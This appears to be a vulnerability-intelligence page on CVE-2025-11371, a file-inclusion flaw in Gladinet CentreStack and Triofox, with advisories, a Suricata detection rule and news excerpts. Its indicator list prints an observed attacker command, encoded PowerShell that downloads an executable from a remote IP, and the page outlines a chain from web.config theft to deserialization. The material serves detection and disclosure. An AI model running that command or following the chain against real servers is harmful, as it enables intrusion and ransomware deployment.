CVE-2025-11371
published 2025-10-09
CVE-2025-11371: In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended…
Priority P1 · 91 · high · 7.5 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability, due 2025-11-25
Exploited in the wild
EPSS: 92.09% (99.8th percentile)
In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild.
This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gladinet | centrestack | < 16.10.10408.56683 | 16.10.10408.56683 |
| gladinet | centrestack_and_triofox | <= 16.7.10368.56560 | — |
| gladinet | triofox | <= 16.7.10368.56560 | — |
Detection & IOCs (extracted from sources)
command: "C:\Windows\System32\cmd.exe" /c powershell -e SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAOQA2AC4AMQAxAC4AMgAwADcAOgA4ADAAMAAwAC8AYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQA=
- Monitor IIS/w3wp.exe for child process execution of cmd.exe or PowerShell, which indicates post-exploitation via ViewState deserialization following LFI of web.config
- Alert on Windows Application Event ID 1316 which captures ViewState deserialization attack payloads in the application event log
- Detect HTTP referrer from FOFA (https://en.fofa.info/) in web server logs preceding exploitation requests against Gladinet endpoints
- Monitor for creation or access of C:\programdata\CentreStac_log.txt, used by attackers to exfiltrate command output via the LFI endpoint
- Alert on creation or execution of conqueror.exe in C:\Users\Public\ as a dropped payload indicator
- Detect requests to /storage/filesvr.dn with a 't' parameter containing a timestamp set to year 9999, indicating a crafted never-expiring access ticket exploiting the hardcoded AES key vulnerability
- The LFI vulnerability (CVE-2025-11371) is exploitable only when the TempDownload handler (t.dn) is enabled in the UploadDownloadProxy Web.config. Disabling this handler mitigates the vulnerability until patching.
CVSS provenance
nvd · v3.1 · 7.5 HIGH · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck · 7.5 HIGH
cisa · 7.5 HIGH
GHSA
GHSA-hj6h-fpv2-5h4v: In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows u
ghsa_unreviewed·2025-10-09
CVE-2025-11371 [MEDIUM] CWE-220 GHSA-hj6h-fpv2-5h4v: In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows u
In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild.
This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560
VulnCheck
Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
vulncheck·2025·CVSS 7.5
CVE-2025-11371 [HIGH] CWE-552 Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
Gladinet CentreStack and Triofox contains a files or directories accessible to external parties vulnerability that allows unintended disclosure of system files.
Affected: Gladinet CentreStack and Triofox
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw; https://horizon3.ai/attack-research/vulnerabilities/cve-2025-11371/; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-11371&date=2025-10-31; https://api.vulncheck.com/v3/index/vulnc
CISA
Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
cisa·2025-11-04·CVSS 7.5
CVE-2025-11371 [HIGH] CWE-552 Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
Vulnerability: Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
Affected: Gladinet CentreStack and Triofox
Gladinet CentreStack and Triofox contains a files or directories accessible to external parties vulnerability that allows unintended disclosure of system files.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://www.centrestack.com/p/gce_latest_release.html ; https://nvd.nist.gov/vuln/detail/CVE-2025-11371
Remediation Due Date: 2025-11-25
Suricata
ET WEB_SPECIFIC_APPS Gladinet CentreStack and Triofox Local File Inclusion (CVE-2025-11371)
suricata·2025-10-20·CVSS 7.5
CVE-2025-11371 [HIGH] ET WEB_SPECIFIC_APPS Gladinet CentreStack and Triofox Local File Inclusion (CVE-2025-11371)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Gladinet CentreStack and Triofox Local File Inclusion (CVE-2025-11371)"; flow:established,to_server; http.uri; content:"|2f|storage|2f|t|2e|dn|3f|"; startswith; fast_pattern; content:"s|3d|"; pcre:"/^[^\x26]*?(?:(?:\x2e|%2[Ee]){1,2}(?:\x2f|\x5c|%5[Cc]|%2[Ff]){1,}){2,}/R"; http.method; content:"GET"; reference:cve,2025-11371; classtype:web-application-attack; sid:2065258; rev:1; metadata:affected_product Gladinet_Triofox, affected_product Gladinet_CentreStack, attack_target Server, tls_state TLSDecrypt, created_at 2025_10_20, cve CVE_2025_11371, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, t
Metasploit
Gladinet CentreStack/Triofox Path Traversal
metasploit·CVSS 7.5
CVE-2025-11371 [HIGH] Gladinet CentreStack/Triofox Path Traversal
This module exploits a path traversal vulnerability (CVE-2025-11371) in Gladinet CentreStack and Triofox that allows an unauthenticated attacker to read arbitrary files from the server's file system. The vulnerability exists in the `/storage/t.dn` endpoint which does not properly sanitize the `s` parameter, allowing path traversal attacks. This can be used to read sensitive files such as Web.config which contains the machineKey used for ViewState deserialization attacks (CVE-2025-30406). Gladinet CentreStack versions up to 16.10.10408.56683 are vulnerable. Gladinet Triofox versions up to 16.10.10408.56683 are vulnerable.
Nuclei
Gladinet CentreStack & TrioFox - Local File Inclusion
nuclei·CVSS 7.5
CVE-2025-11371 [HIGH] Gladinet CentreStack & TrioFox - Local File Inclusion
In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560
Template:
id: CVE-2025-11371
info:
  name: Gladinet CentreStack & TrioFox - Local File Inclusion
  author: Kazgangap
  severity: medium
  description: |
    In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been obser
Huntress
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
blogs_huntress·2025-12-18
Acknowledgments: Special thanks to John Hammond for his contributions to this investigation and write-up.
Update #2: 12/18/25 @ 6pm ET
We’ve seen reports from other intelligence firms that note that the cl0p ransomware group is targeting internet-facing Gladinet CentreStack servers. It is still early and we can’t fully confirm if this behavior definitively stems from cl0p. However, we continue to monitor for potential Gladinet exploitation. Most recently, we observed two new incidents on December 15.
Based on the available telemetry, both of these incidents involved suspected Gladinet CentreStack exploitation.
As seen in Figure 1 below, both incidents involved the same indicators involving a PowerShell command, which was executed via w3wp.exe:
"C:\Windows\System32\cmd.exe" /c powers
Bleepingcomputer
Hackers abuse Triofox antivirus feature to deploy remote access tools
blogs_bleepingcomputer·2025-11-11·CVSS 9.1
CVE-2025-12480 [CRITICAL] Hackers abuse Triofox antivirus feature to deploy remote access tools
## Hackers abuse Triofox antivirus feature to deploy remote access tools
## Bill Toulas
Hackers exploited a critical vulnerability and the built-in antivirus feature in Gladinet's Triofox file-sharing and remote-access platform to achieve remote code execution with SYSTEM privileges.
The security issue leveraged in the attack is CVE-2025-12480 and can be used to bypass authentication and obtain access to the application's setup pages.
Security researchers at Google Threat Intelligence Group (GTIG) discovered the malicious activity on August 24, after a threat cluster tracked internally as UNC6485 targeted a Triofox server running version 16.4.10317.56372, released on April 3.
The root cause for CVE-2025-12480 is an access control logic gap where admin access is granted when the applic
Bleepingcomputer
CISA warns of critical CentOS Web Panel bug exploited in attacks
blogs_bleepingcomputer·2025-11-05·CVSS 7.5
[HIGH] CISA warns of critical CentOS Web Panel bug exploited in attacks
## CISA warns of critical CentOS Web Panel bug exploited in attacks
## Bill Toulas
CWP is a free web hosting control panel used for Linux server management, marketed as an open-source alternative to commercial panels like cPanel and Plesk. It is widely used by web hosting providers, system administrators, and VPS or dedicated server operators.
The issue impacts all CWP versions before 0.9.8.1204 and was demonstrated on CentOS 7 in late June by Fenrisk security researcher Maxime Rinaudo.
In a detailed technical write-up, the researcher explains that the root cause of the flaw is the file-manager ‘changePerm’ endpoint processing requests even when the per-user identifier is omitted, allowing unauthenticated requests to reach code that expects a logged-in user.
Furthermore, the ‘ t_to
Bleepingcomputer
Gladinet fixes actively exploited zero-day in file-sharing software
blogs_bleepingcomputer·2025-10-16·CVSS 7.5
CVE-2025-11371 [HIGH] Gladinet fixes actively exploited zero-day in file-sharing software
## Gladinet fixes actively exploited zero-day in file-sharing software
## Bill Toulas
Gladinet has released security updates for its CentreStack business solution to address a local file inclusion vulnerability (CVE-2025-11371) that threat actors have leveraged as a zero-day since late September.
Researchers at cybersecurity platform Huntress disclosed the exploitation activity last week saying that the flaw was a bypass for mitigations Gladinet implemented for the deserialization vulnerability leading to remote code execution (RCE) identified as CVE-2025-30406.
The local file inclusion (LFI) vulnerability enabled attackers to read the Web.config file on fully patched CentreStack deployments, extract the machine key, and then use it to exploit CVE-2025-30406.
When Huntress alerted of
Huntress
Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw
blogs_huntress·2025-10-15·CVSS 7.5
[HIGH] Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw
Update #1: 10/15/25 @ 1pm ET
On October 14, Gladinet released version 16.10.10408.56683 of CentreStack, which includes a fix for the local file inclusion vulnerability outlined below. Huntress recommends that impacted organizations update to the latest build number as soon as possible.
As a patch has now been issued, we are also releasing further analysis of the vulnerability and exploitation activity, as detailed below. The below also includes parts of the original blog, published 10/9/25.
TL;DR: Huntress has discovered in-the-wild exploitation of an unauthenticated Local File Inclusion flaw (CVE-2025-11371) in Gladinet CentreStack and Triofox products. As of the initial writing of this blog, a patch was not available in the latest versions of CentreStack and Triofox.
## Background
Bleepingcomputer
Hackers exploiting zero-day in Gladinet file sharing software
blogs_bleepingcomputer·2025-10-10·CVSS 7.5
CVE-2025-11371 [HIGH] Hackers exploiting zero-day in Gladinet file sharing software
## Hackers exploiting zero-day in Gladinet file sharing software
## Bill Toulas
Threat actors are exploiting a zero-day vulnerability (CVE-2025-11371) in Gladinet CentreStack and Triofox products, which allows a local attacker to access system files without authentication.
At least three companies have been targeted so far. Although a patch is not yet available, customers can apply mitigations.
CentreStack and Triofox are Gladinet's business solutions for file sharing and remote access that allow using a company's own storage as a cloud. According to the vendor, CentreStack "is used by thousands of businesses from over 49 countries."
## No fix, all versions affected
The zero-day vulnerability CVE-2025-11371 is a Local File Inclusion (LFI) flaw affecting the default installation and c
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
Wiz
CVE-2025-14611 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-14611 [HIGH] CVE-2025-14611 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14611:
Gladinet CentreStack vulnerability analysis and mitigation
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.
Source: NVD
Score: 7.1
Published: December 12, 2025
Severity: HIGH
CNA Score: 7.1
Affected Technologies: Gladinet CentreStack
Has Public Exploit: Yes
Has CISA KEV Exploit: Yes
CISA KEV Release Date: N/A
CISA KEV Due Date: N/A
Exploitation Probability Pe
Recorded Future
October 2025 CVE Landscape
blogs_recorded_future·CVSS 9.8
[CRITICAL] October 2025 CVE Landscape
# October 2025 CVE Landscape: 32 High-Impact Vulnerabilities Demand Immediate Attention
October 2025 saw a significant escalation in vulnerability activity, with Recorded Future's Insikt Group® identifying 32 high-impact vulnerabilities, double the 16 identified in September's CVE report. Twenty-six of these vulnerabilities scored as Very Critical.
What security teams need to know:
- Microsoft dominates: Eight of 32 vulnerabilities affect Microsoft products, including a critical WSUS deserialization flaw (CVE-2025-59287) now being actively exploited
- CL0P ransomware group exploited an Oracle E-Business Suite zero-day (CVE-2025-61882) for data theft and extortion campaigns
- Legacy vulnerabilities persist: Five of the 14 RCE-enabling vulnerabilities are over a decade old, highlighting c
2025-10-09: Published
2025-11-04: Added to CISA KEV
Exploited in the wild